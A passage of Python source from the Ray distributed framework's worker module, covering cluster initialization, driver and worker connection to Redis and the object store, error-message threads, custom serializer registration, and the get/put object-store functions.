num_cpus = num_local_schedulers * [num_cpus]
if not isinstance(num_gpus, list):
num_gpus = num_local_schedulers * [num_gpus]
if not isinstance(resources, list):
resources = num_local_schedulers * [resources]
new_resources = [r.copy() for r in resources]
for i in range(num_local_schedulers):
assert "CPU" not in new_resources[i], "Use the 'num_cpus' argument."
assert "GPU" not in new_resources[i], "Use the 'num_gpus' argument."
if num_cpus[i] is not None:
new_resources[i]["CPU"] = num_cpus[i]
if num_gpus[i] is not None:
new_resources[i]["GPU"] = num_gpus[i]
return new_resources
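# A small worked example of the normalization above (values are illustrative),
# assuming two local schedulers:
#
#     _normalize_resource_arguments(4, [1, 0], {"Custom": 2}, 2)
#     # -> [{"Custom": 2, "CPU": 4, "GPU": 1},
#     #     {"Custom": 2, "CPU": 4, "GPU": 0}]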
def _init(address_info=None,
start_ray_local=False,
object_id_seed=None,
num_workers=None,
num_local_schedulers=None,
object_store_memory=None,
driver_mode=SCRIPT_MODE,
redirect_worker_output=False,
redirect_output=True,
start_workers_from_local_scheduler=True,
num_cpus=None,
num_gpus=None,
resources=None,
num_redis_shards=None,
redis_max_clients=None,
plasma_directory=None,
huge_pages=False,
include_webui=True,
use_raylet=None):
"""Helper method to connect to an existing Ray cluster or start a new one.
This method handles two cases. Either a Ray cluster already exists and we
just attach this driver to it, or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
Args:
address_info (dict): A dictionary with address information for
processes in a partially-started Ray cluster. If
start_ray_local=True, any processes not in this dictionary will be
started. If provided, an updated address_info dictionary will be
returned to include processes that are newly started.
start_ray_local (bool): If True then this will start any processes not
already in address_info, including Redis, a global scheduler, local
scheduler(s), object store(s), and worker(s). It will also kill
these processes when Python exits. If False, this will attach to an
existing Ray cluster.
object_id_seed (int): Used to seed the deterministic generation of
object IDs. The same value can be used across multiple runs of the
same job in order to generate the object IDs in a consistent
manner. However, the same ID should not be used for different jobs.
num_workers (int): The number of workers to start. This is only
provided if start_ray_local is True.
num_local_schedulers (int): The number of local schedulers to start.
This is only provided if start_ray_local is True.
object_store_memory: The amount of memory (in bytes) to start the
object store with.
driver_mode: The mode in which to start the driver. This should
be one of ray.SCRIPT_MODE, ray.LOCAL_MODE, and ray.SILENT_MODE.
redirect_worker_output: True if the stdout and stderr of worker
processes should be redirected to files.
redirect_output (bool): True if stdout and stderr for non-worker
processes should be redirected to files and false otherwise.
start_workers_from_local_scheduler (bool): If this flag is True, then
start the initial workers from the local scheduler. Else, start
them from Python. The latter case is for debugging purposes only.
num_cpus (int): Number of cpus the user wishes all local schedulers to
be configured with.
num_gpus (int): Number of gpus the user wishes all local schedulers to
be configured with. If unspecified, Ray will attempt to autodetect
the number of GPUs available on the node (note that autodetection
currently only works for Nvidia GPUs).
resources: A dictionary mapping resource names to the quantity of that
resource available.
num_redis_shards: The number of Redis shards to start in addition to
the primary Redis shard.
redis_max_clients: If provided, attempt to configure Redis with this
maxclients number.
plasma_directory: A directory where the Plasma memory mapped files will
be created.
huge_pages: Boolean flag indicating whether to start the Object
Store with hugetlbfs support. Requires plasma_directory.
include_webui: Boolean flag indicating whether to start the web
UI, which is a Jupyter notebook.
use_raylet: True if the new raylet code path should be used.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
check_main_thread()
if driver_mode not in [SCRIPT_MODE, LOCAL_MODE, SILENT_MODE]:
raise Exception("Driver_mode must be in [ray.SCRIPT_MODE, "
"ray.LOCAL_MODE, ray.SILENT_MODE].")
if use_raylet is None and os.environ.get("RAY_USE_XRAY") == "1":
# This environment variable is used in our testing setup.
logger.info("Detected environment variable 'RAY_USE_XRAY'.")
use_raylet = True
# Get addresses of existing services.
if address_info is None:
address_info = {}
else:
assert isinstance(address_info, dict)
node_ip_address = address_info.get("node_ip_address")
redis_address = address_info.get("redis_address")
# Start any services that do not yet exist.
if driver_mode == LOCAL_MODE:
# If starting Ray in LOCAL_MODE, don't start any other processes.
pass
elif start_ray_local:
# In this case, we launch a scheduler, a new object store, and some
# workers, and we connect to them. We do not launch any processes that
# are already registered in address_info.
if node_ip_address is None:
node_ip_address = ray.services.get_node_ip_address()
# Use 1 local scheduler if num_local_schedulers is not provided. If
# existing local schedulers are provided, use that count as
# num_local_schedulers.
local_schedulers = address_info.get("local_scheduler_socket_names", [])
if num_local_schedulers is None:
if len(local_schedulers) > 0:
num_local_schedulers = len(local_schedulers)
else:
num_local_schedulers = 1
# Use 1 additional redis shard if num_redis_shards is not provided.
num_redis_shards = 1 if num_redis_shards is None else num_redis_shards
# Stick the CPU and GPU resources into the resource dictionary.
resources = _normalize_resource_arguments(
num_cpus, num_gpus, resources, num_local_schedulers)
# Start the scheduler, object store, and some workers. These will be
# killed by the call to shutdown(), which happens when the Python
# script exits.
address_info = services.start_ray_head(
address_info=address_info,
node_ip_address=node_ip_address,
num_workers=num_workers,
num_local_schedulers=num_local_schedulers,
object_store_memory=object_store_memory,
redirect_worker_output=redirect_worker_output,
redirect_output=redirect_output,
start_workers_from_local_scheduler=(
start_workers_from_local_scheduler),
resources=resources,
num_redis_shards=num_redis_shards,
redis_max_clients=redis_max_clients,
plasma_directory=plasma_directory,
huge_pages=huge_pages,
include_webui=include_webui,
use_raylet=use_raylet)
else:
if redis_address is None:
raise Exception("When connecting to an existing cluster, "
"redis_address must be provided.")
if num_workers is not None:
raise Exception("When connecting to an existing cluster, "
"num_workers must not be provided.")
if num_local_schedulers is not None:
raise Exception("When connecting to an existing cluster, "
"num_local_schedulers must not be provided.")
if num_cpus is not None or num_gpus is not None:
raise Exception("When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise Exception("When connecting to an existing cluster, "
"resources must not be provided.")
if num_redis_shards is not None:
raise Exception("When connecting to an existing cluster, "
"num_redis_shards must not be provided.")
if redis_max_clients is not None:
raise Exception("When connecting to an existing cluster, "
"redis_max_clients must not be provided.")
if object_store_memory is not None:
raise Exception("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if plasma_directory is not None:
raise Exception("When connecting to an existing cluster, "
"plasma_directory must not be provided.")
if huge_pages:
raise Exception("When connecting to an existing cluster, "
"huge_pages must not be provided.")
# Get the node IP address if one is not provided.
if node_ip_address is None:
node_ip_address = services.get_node_ip_address(redis_address)
# Get the address info of the processes to connect to from Redis.
address_info = get_address_info_from_redis(
redis_address, node_ip_address, use_raylet=use_raylet)
# Connect this driver to Redis, the object store, and the local scheduler.
# Choose the first object store and local scheduler if there are multiple.
# The corresponding call to disconnect will happen in the call to
# shutdown() when the Python script exits.
if driver_mode == LOCAL_MODE:
driver_address_info = {}
else:
driver_address_info = {
"node_ip_address": node_ip_address,
"redis_address": address_info["redis_address"],
"store_socket_name": (
address_info["object_store_addresses"][0].name),
"webui_url": address_info["webui_url"]
}
if not use_raylet:
driver_address_info["manager_socket_name"] = (
address_info["object_store_addresses"][0].manager_name)
driver_address_info["local_scheduler_socket_name"] = (
address_info["local_scheduler_socket_names"][0])
else:
driver_address_info["raylet_socket_name"] = (
address_info["raylet_socket_names"][0])
connect(
driver_address_info,
object_id_seed=object_id_seed,
mode=driver_mode,
worker=global_worker,
use_raylet=use_raylet)
return address_info
def init(redis_address=None,
num_cpus=None,
num_gpus=None,
resources=None,
object_store_memory=None,
node_ip_address=None,
object_id_seed=None,
num_workers=None,
driver_mode=SCRIPT_MODE,
redirect_worker_output=False,
redirect_output=True,
ignore_reinit_error=False,
num_custom_resource=None,
num_redis_shards=None,
redis_max_clients=None,
plasma_directory=None,
huge_pages=False,
include_webui=True,
use_raylet=None):
"""Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases. Either a Ray cluster already exists and we
just attach this driver to it, or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray and all of the relevant processes, use this as follows:
.. code-block:: python
ray.init()
To connect to an existing Ray cluster, use this as follows (substituting
in the appropriate address):
.. code-block:: python
ray.init(redis_address="123.45.67.89:6379")
Args:
redis_address (str): The address of the Redis server to connect to. If
this address is not provided, then this command will start Redis, a
global scheduler, a local scheduler, a plasma store, a plasma
manager, and some workers. It will also kill these processes when
Python exits.
num_cpus (int): Number of cpus the user wishes all local schedulers to
be configured with.
num_gpus (int): Number of gpus the user wishes all local schedulers to
be configured with.
resources: A dictionary mapping the name of a resource to the quantity
of that resource available.
object_store_memory: The amount of memory (in bytes) to start the
object store with.
node_ip_address (str): The IP address of the node that we are on.
object_id_seed (int): Used to seed the deterministic generation of
object IDs. The same value can be used across multiple runs of the
same job in order to generate the object IDs in a consistent
manner. However, the same ID should not be used for different jobs.
num_workers (int): The number of workers to start. This is only
provided if redis_address is not provided.
driver_mode: The mode in which to start the driver. This should
be one of ray.SCRIPT_MODE, ray.LOCAL_MODE, and ray.SILENT_MODE.
redirect_worker_output: True if the stdout and stderr of worker
processes should be redirected to files.
redirect_output (bool): True if stdout and stderr for non-worker
processes should be redirected to files and false otherwise.
ignore_reinit_error: True if we should suppress errors from calling
ray.init() a second time.
num_redis_shards: The number of Redis shards to start in addition to
the primary Redis shard.
redis_max_clients: If provided, attempt to configure Redis with this
maxclients number.
plasma_directory: A directory where the Plasma memory mapped files will
be created.
huge_pages: Boolean flag indicating whether to start the Object
Store with hugetlbfs support. Requires plasma_directory.
include_webui: Boolean flag indicating whether to start the web
UI, which is a Jupyter notebook.
use_raylet: True if the new raylet code path should be used.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
if global_worker.connected:
if ignore_reinit_error:
logger.error("Calling ray.init() again after it has already been "
"called.")
return
else:
raise Exception("Perhaps you called ray.init twice by accident?")
if use_raylet is None and os.environ.get("RAY_USE_XRAY") == "1":
# This environment variable is used in our testing setup.
logger.info("Detected environment variable 'RAY_USE_XRAY'.")
use_raylet = True
# Convert hostnames to numerical IP address.
if node_ip_address is not None:
node_ip_address = services.address_to_ip(node_ip_address)
if redis_address is not None:
redis_address = services.address_to_ip(redis_address)
info = {"node_ip_address": node_ip_address, "redis_address": redis_address}
ret = _init(
address_info=info,
start_ray_local=(redis_address is None),
num_workers=num_workers,
driver_mode=driver_mode,
redirect_worker_output=redirect_worker_output,
redirect_output=redirect_output,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=num_redis_shards,
redis_max_clients=redis_max_clients,
plasma_directory=plasma_directory,
huge_pages=huge_pages,
include_webui=include_webui,
object_store_memory=object_store_memory,
use_raylet=use_raylet)
for hook in _post_init_hooks:
hook()
return ret
# Functions to run as callbacks after a successful call to ray.init().
_post_init_hooks = []
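# Hypothetical example of a post-init hook: any argument-less callable
# appended to this list is invoked once ray.init() has finished connecting.
#
#     ray.worker._post_init_hooks.append(lambda: logger.info("Ray is ready."))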
def cleanup(worker=global_worker):
raise DeprecationWarning(
"The function ray.worker.cleanup() has been deprecated. Instead, "
"please call ray.shutdown().")
def shutdown(worker=global_worker):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to clean up state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
"""
disconnect(worker)
if hasattr(worker, "local_scheduler_client"):
del worker.local_scheduler_client
if hasattr(worker, "plasma_client"):
worker.plasma_client.disconnect()
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
# If this is a driver, push the finish time to Redis and clean up any
# other services that were started with the driver.
worker.redis_client.hmset(b"Drivers:" + worker.worker_id,
{"end_time": time.time()})
services.cleanup()
else:
# If this is not a driver, make sure there are no orphan processes,
# besides possibly the worker itself.
for process_type, processes in services.all_processes.items():
if process_type == services.PROCESS_TYPE_WORKER:
assert len(processes) <= 1
else:
assert len(processes) == 0
worker.set_mode(None)
atexit.register(shutdown)
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to redis.
if global_worker.mode in [SCRIPT_MODE, SILENT_MODE]:
error_message = "".join(traceback.format_tb(tb))
global_worker.redis_client.hmset(b"Drivers:" + global_worker.worker_id,
{"exception": error_message})
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_error_messages_raylet(worker):
"""Print error messages in the background on the driver.
This runs in a separate thread on the driver and prints error messages in
the background.
"""
if not worker.use_raylet:
raise Exception("This function is specific to the raylet code path.")
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = str(
ray.gcs_utils.TablePubsub.ERROR_INFO).encode("ascii")
worker.error_message_pubsub_client.subscribe(error_pubsub_channel)
# worker.error_message_pubsub_client.psubscribe("*")
# Keep a set of all the error messages that we've seen so far in order to
# avoid printing the same error message repeatedly. This is especially
# important when running a script inside of a tool like screen where
# scrolling is difficult.
old_error_messages = set()
# Get the exports that occurred before the call to subscribe.
with worker.lock:
error_messages = global_state.error_messages(worker.task_driver_id)
for error_message in error_messages:
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error("Suppressing duplicate error message.")
try:
for msg in worker.error_message_pubsub_client.listen():
gcs_entry = ray.gcs_utils.GcsTableEntry.GetRootAsGcsTableEntry(
msg["data"], 0)
assert gcs_entry.EntriesLength() == 1
error_data = ray.gcs_utils.ErrorTableData.GetRootAsErrorTableData(
gcs_entry.Entries(0), 0)
NIL_JOB_ID = 20 * b"\x00"
job_id = error_data.JobId()
if job_id not in [worker.task_driver_id.id(), NIL_JOB_ID]:
continue
error_message = ray.utils.decode(error_data.ErrorMessage())
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error("Suppressing duplicate error message.")
except redis.ConnectionError:
# When Redis terminates the listen call will throw a ConnectionError,
# which we catch here.
pass
def print_error_messages(worker):
"""Print error messages in the background on the driver.
This runs in a separate thread on the driver and prints error messages in
the background.
"""
# TODO(rkn): All error messages should have a "component" field indicating
# which process the error came from (e.g., a worker or a plasma store).
# Currently all error messages come from workers.
worker.error_message_pubsub_client = worker.redis_client.pubsub()
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
worker.error_message_pubsub_client.subscribe("__keyspace@0__:ErrorKeys")
num_errors_received = 0
# Keep a set of all the error messages that we've seen so far in order to
# avoid printing the same error message repeatedly. This is especially
# important when running a script inside of a tool like screen where
# scrolling is difficult.
old_error_messages = set()
# Get the exports that occurred before the call to subscribe.
with worker.lock:
error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
for error_key in error_keys:
if error_applies_to_driver(error_key, worker=worker):
error_message = ray.utils.decode(
worker.redis_client.hget(error_key, "message"))
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error("Suppressing duplicate error message.")
num_errors_received += 1
try:
for msg in worker.error_message_pubsub_client.listen():
with worker.lock:
for error_key in worker.redis_client.lrange(
"ErrorKeys", num_errors_received, -1):
if error_applies_to_driver(error_key, worker=worker):
error_message = ray.utils.decode(
worker.redis_client.hget(error_key, "message"))
if error_message not in old_error_messages:
logger.error(error_message)
old_error_messages.add(error_message)
else:
logger.error(
"Suppressing duplicate error message.")
num_errors_received += 1
except redis.ConnectionError:
# When Redis terminates the listen call will throw a ConnectionError,
# which we catch here.
pass
def connect(info,
object_id_seed=None,
mode=WORKER_MODE,
worker=global_worker,
use_raylet=False):
"""Connect this worker to the local scheduler, to Plasma, and to Redis.
Args:
info (dict): A dictionary with address of the Redis server and the
sockets of the plasma store, plasma manager, and local scheduler.
object_id_seed: A seed to use to make the generation of object IDs
deterministic.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE,
LOCAL_MODE, and SILENT_MODE.
use_raylet: True if the new raylet code path should be used.
"""
check_main_thread()
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
assert worker.cached_remote_functions_and_actors is not None, error_message
# Initialize some fields.
worker.worker_id = random_string()
# When tasks are executed on remote workers in the context of multiple
# drivers, the task driver ID is used to keep track of which driver is
# responsible for the task so that error messages will be propagated to
# the correct driver.
if mode != WORKER_MODE:
worker.task_driver_id = ray.ObjectID(worker.worker_id)
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.actor_id = NIL_ACTOR_ID
worker.connected = True
worker.set_mode(mode)
worker.use_raylet = use_raylet
# If running Ray in LOCAL_MODE, there is no need to call
# create_worker or to start the worker service.
if mode == LOCAL_MODE:
return
# Set the node IP address.
worker.node_ip_address = info["node_ip_address"]
worker.redis_address = info["redis_address"]
# Create a Redis client.
redis_ip_address, redis_port = info["redis_address"].split(":")
worker.redis_client = redis.StrictRedis(
host=redis_ip_address, port=int(redis_port))
# For drivers, check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray.services.check_version_info(worker.redis_client)
except Exception as e:
if mode in [SCRIPT_MODE, SILENT_MODE]:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray.utils.push_error_to_driver_through_redis(
worker.redis_client,
worker.use_raylet,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
driver_id=None)
worker.lock = threading.Lock()
# Check the RedirectOutput key in Redis and based on its value redirect
# worker output and error to their own files.
if mode == WORKER_MODE:
# This key is set in services.py when Redis is started.
redirect_worker_output_val = worker.redis_client.get("RedirectOutput")
if (redirect_worker_output_val is not None
and int(redirect_worker_output_val) == 1):
redirect_worker_output = 1
else:
redirect_worker_output = 0
if redirect_worker_output:
log_stdout_file, log_stderr_file = services.new_log_files(
"worker", True)
sys.stdout = log_stdout_file
sys.stderr = log_stderr_file
services.record_log_files_in_redis(
info["redis_address"], info["node_ip_address"],
[log_stdout_file, log_stderr_file])
# Create an object for interfacing with the global state.
global_state._initialize_global_state(redis_ip_address, int(redis_port))
# Register the worker with Redis.
if mode in [SCRIPT_MODE, SILENT_MODE]:
# The concept of a driver is the same as the concept of a "job".
# Register the driver/job with Redis here.
import __main__ as main
driver_info = {
"node_ip_address": worker.node_ip_address,
"driver_id": worker.worker_id,
"start_time": time.time(),
"plasma_store_socket": info["store_socket_name"],
"plasma_manager_socket": info.get("manager_socket_name"),
"local_scheduler_socket": info.get("local_scheduler_socket_name"),
"raylet_socket": info.get("raylet_socket_name")
}
driver_info["name"] = (main.__file__ if hasattr(main, "__file__") else
"INTERACTIVE MODE")
worker.redis_client.hmset(b"Drivers:" + worker.worker_id, driver_info)
if not worker.redis_client.exists("webui"):
worker.redis_client.hmset("webui", {"url": info["webui_url"]})
is_worker = False
elif mode == WORKER_MODE:
# Register the worker with Redis.
worker_dict = {
"node_ip_address": worker.node_ip_address,
"plasma_store_socket": info["store_socket_name"],
"plasma_manager_socket": info["manager_socket_name"],
"local_scheduler_socket": info["local_scheduler_socket_name"]
}
if redirect_worker_output:
worker_dict["stdout_file"] = os.path.abspath(log_stdout_file.name)
worker_dict["stderr_file"] = os.path.abspath(log_stderr_file.name)
worker.redis_client.hmset(b"Workers:" + worker.worker_id, worker_dict)
is_worker = True
else:
raise Exception("This code should be unreachable.")
# Create an object store client.
if not worker.use_raylet:
worker.plasma_client = plasma.connect(info["store_socket_name"],
info["manager_socket_name"], 64)
else:
worker.plasma_client = plasma.connect(info["store_socket_name"], "",
64)
if not worker.use_raylet:
local_scheduler_socket = info["local_scheduler_socket_name"]
else:
local_scheduler_socket = info["raylet_socket_name"]
worker.local_scheduler_client = ray.local_scheduler.LocalSchedulerClient(
local_scheduler_socket, worker.worker_id, is_worker, worker.use_raylet)
# If this is a driver, set the current task ID, the task driver ID, and set
# the task index to 0.
if mode in [SCRIPT_MODE, SILENT_MODE]:
# If the user provided an object_id_seed, then set the current task ID
# deterministically based on that seed (without altering the state of
# the user's random number generator). Otherwise, set the current task
# ID randomly to avoid object ID collisions.
numpy_state = np.random.get_state()
if object_id_seed is not None:
np.random.seed(object_id_seed)
else:
# Try to use true randomness.
np.random.seed(None)
worker.current_task_id = ray.ObjectID(np.random.bytes(20))
# Reset the state of the numpy random number generator.
np.random.set_state(numpy_state)
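# For example, two runs of the same script that both pass
# object_id_seed=0 to ray.init() will generate the same sequence of
# task and object IDs, which is what makes reruns reproducible.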
# Set other fields needed for computing task IDs.
worker.task_index = 0
worker.put_index = 1
# Create an entry for the driver task in the task table. This task is
# added immediately with status RUNNING. This allows us to push errors
# related to this driver task back to the driver. For example, if the
# driver creates an object that is later evicted, we should notify the
# user that we're unable to reconstruct the object, since we cannot
# rerun the driver.
nil_actor_counter = 0
driver_task = ray.local_scheduler.Task(
worker.task_driver_id, ray.ObjectID(NIL_FUNCTION_ID), [], 0,
worker.current_task_id, worker.task_index,
ray.ObjectID(NIL_ACTOR_ID), ray.ObjectID(NIL_ACTOR_ID),
ray.ObjectID(NIL_ACTOR_ID), ray.ObjectID(NIL_ACTOR_ID),
nil_actor_counter, False, [], {"CPU": 0}, worker.use_raylet)
# Add the driver task to the task table.
if not worker.use_raylet:
global_state._execute_command(
driver_task.task_id(), "RAY.TASK_TABLE_ADD",
driver_task.task_id().id(), TASK_STATUS_RUNNING,
NIL_LOCAL_SCHEDULER_ID,
driver_task.execution_dependencies_string(), 0,
ray.local_scheduler.task_to_string(driver_task))
else:
global_state._execute_command(
driver_task.task_id(), "RAY.TABLE_ADD",
ray.gcs_utils.TablePrefix.RAYLET_TASK,
ray.gcs_utils.TablePubsub.RAYLET_TASK,
driver_task.task_id().id(),
driver_task._serialized_raylet_task())
# Set the driver's current task ID to the task ID assigned to the
# driver task.
worker.current_task_id = driver_task.task_id()
# Initialize the serialization library. This registers some classes, and so
# it must be run before we export all of the cached remote functions.
_initialize_serialization()
# Start the import thread
import_thread.ImportThread(worker, mode).start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
if not worker.use_raylet:
t = threading.Thread(target=print_error_messages, args=(worker, ))
else:
t = threading.Thread(
target=print_error_messages_raylet, args=(worker, ))
# Making the thread a daemon causes it to exit when the main thread
# exits.
t.daemon = True
t.start()
if mode in [SCRIPT_MODE, SILENT_MODE] and worker.use_raylet:
worker.profiler.start_flush_thread()
if mode in [SCRIPT_MODE, SILENT_MODE]:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the cluster
# are the same.
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
# Export cached remote functions to the workers.
for cached_type, info in worker.cached_remote_functions_and_actors:
if cached_type == "remote_function":
info._export()
elif cached_type == "actor":
(key, actor_class_info) = info
ray.actor.publish_actor_class_to_key(key, actor_class_info,
worker)
else:
assert False, "This code should be unreachable."
worker.cached_functions_to_run = None
worker.cached_remote_functions_and_actors = None
def disconnect(worker=global_worker):
"""Disconnect this worker from the scheduler and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker.connected = False
worker.cached_functions_to_run = []
worker.cached_remote_functions_and_actors = []
worker.serialization_context = pyarrow.SerializationContext()
def _try_to_compute_deterministic_class_id(cls, depth=5):
"""Attempt to produce a deterministic class ID for a given class.
The goal here is for the class ID to be the same when this is run on
different worker processes. Pickling, loading, and pickling again seems to
produce more consistent results than simply pickling. This is a bit crazy
and could cause problems, in which case we should revert it and figure out
something better.
Args:
cls: The class to produce an ID for.
depth: The number of times to repeatedly try to load and dump the
string while trying to reach a fixed point.
Returns:
A class ID for this class. We attempt to make the class ID the same
when this function is run on different workers, but that is not
guaranteed.
Raises:
Exception: This could raise an exception if cloudpickle raises an
exception.
"""
# Pickling, loading, and pickling again seems to produce more consistent
# results than simply pickling.
class_id = pickle.dumps(cls)
for _ in range(depth):
new_class_id = pickle.dumps(pickle.loads(class_id))
if new_class_id == class_id:
# We appear to have reached a fixed point, so use this as the ID.
return hashlib.sha1(new_class_id).digest()
class_id = new_class_id
# We have not reached a fixed point, so we may end up with a different
# class ID for this custom class on each worker, which could lead to the
# same class definition being exported many times.
logger.warning(
"WARNING: Could not produce a deterministic class ID for class "
"{}".format(cls))
return hashlib.sha1(new_class_id).digest()
def register_custom_serializer(cls,
use_pickle=False,
use_dict=False,
serializer=None,
deserializer=None,
local=False,
worker=global_worker):
"""Enable serialization and deserialization for a particular class.
This method runs the register_class function defined below on every worker,
which will enable ray to properly serialize and deserialize objects of
this class.
Args:
cls (type): The class that ray should use this custom serializer for.
use_pickle (bool): If true, then objects of this class will be
serialized using pickle.
use_dict: If true, then objects of this class will be serialized by
turning their __dict__ fields into a dictionary. Must be False if
use_pickle is true.
serializer: The custom serializer to use. This should be provided if
and only if use_pickle and use_dict are False.
deserializer: The custom deserializer to use. This should be provided
if and only if use_pickle and use_dict are False.
local: True if the serializers should only be registered on the current
worker. This should usually be False.
Raises:
Exception: An exception is raised if use_pickle is False and the class cannot
be efficiently serialized by Ray. This can also raise an exception
if use_dict is true and cls is not pickleable.
"""
assert (serializer is None) == (deserializer is None), (
"The serializer/deserializer arguments must both be provided or "
"both not be provided.")
use_custom_serializer = (serializer is not None)
assert use_custom_serializer + use_pickle + use_dict == 1, (
"Exactly one of use_pickle, use_dict, or serializer/deserializer must "
"be specified.")
if use_dict:
# Raise an exception if cls cannot be serialized efficiently by Ray.
serialization.check_serializable(cls)
if not local:
# In this case, the class ID will be used to deduplicate the class
# across workers. Note that cloudpickle unfortunately does not produce
# deterministic strings, so these IDs could be different on different
# workers. We could use something weaker like cls.__name__, however
# that would run the risk of having collisions. TODO(rkn): We should
# improve this.
try:
# Attempt to produce a class ID that will be the same on each
# worker. However, determinism is not guaranteed, and the result
# may be different on different workers.
class_id = _try_to_compute_deterministic_class_id(cls)
except Exception as e:
raise serialization.CloudPickleError("Failed to pickle class "
"'{}'".format(cls))
else:
# In this case, the class ID only needs to be meaningful on this worker
# and not across workers.
class_id = random_string()
def register_class_for_serialization(worker_info):
# TODO(rkn): We need to be more thoughtful about what to do if custom
# serializers have already been registered for class_id. In some cases,
# we may want to use the last user-defined serializers and ignore
# subsequent calls to register_custom_serializer that were made by the
# system.
worker_info["worker"].serialization_context.register_type(
cls,
class_id,
pickle=use_pickle,
custom_serializer=serializer,
custom_deserializer=deserializer)
if not local:
worker.run_function_on_all_workers(register_class_for_serialization)
else:
# Since we are pickling objects of this class, we don't actually need
# to ship the class definition.
register_class_for_serialization({"worker": worker})
def get(object_ids, worker=global_worker):
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ID is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_ids is a list, then the objects
corresponding to each object ID in the list will be returned.
Args:
object_ids: Object ID of the object to get or a list of object IDs to
get.
Returns:
A Python object or a list of Python objects.
Raises:
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker.check_connected()
with profiling.profile("ray.get", worker=worker):
check_main_thread()
if worker.mode == LOCAL_MODE:
# In LOCAL_MODE, ray.get is the identity operation (the input will
# actually be a value not an objectid).
return object_ids
if isinstance(object_ids, list):
values = worker.get_object(object_ids)
for i, value in enumerate(values):
if isinstance(value, RayTaskError):
raise RayGetError(object_ids[i], value)
return values
else:
value = worker.get_object([object_ids])[0]
if isinstance(value, RayTaskError):
# If the result is a RayTaskError, then the task that created
# this object failed, and we should propagate the error message
# here.
raise RayGetError(object_ids, value)
return value
def put(value, worker=global_worker):
"""Store an object in the object store.
Args:
value: The Python object to be stored.
Returns:
The object ID assigned to this value.
"""
worker.check_connected()
with profiling.profile("ray.put", worker=worker):
check_main_thread()
if worker.mode == LOCAL_MODE:
# In LOCAL_MODE, ray.put is the identity operation.
return value
object_id = worker.local_scheduler_client.compute_put_id(
worker.current_task_id, worker.put_index, worker.use_raylet)
worker.put_object(object_id, value)
worker.put_index += 1
return object_id
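# Illustrative sketch (not part of the original module): a round trip
# through the object store using the put and get functions defined above.
def _example_put_get():
    object_id = put([1, 2, 3])            # store the value, receive an ObjectID
    assert get(object_id) == [1, 2, 3]    # blocks until the value is local
    # Passing a list of IDs returns the corresponding values in the same order.
    ids = [put(i) for i in range(3)]
    assert get(ids) == [0, 1, 2]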
def wait(object_ids, num_returns=1, timeout=None, worker=global_worker):
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object IDs.
This method returns two lists. The first list consists of object IDs that
correspond to objects that are available in the object store. The second
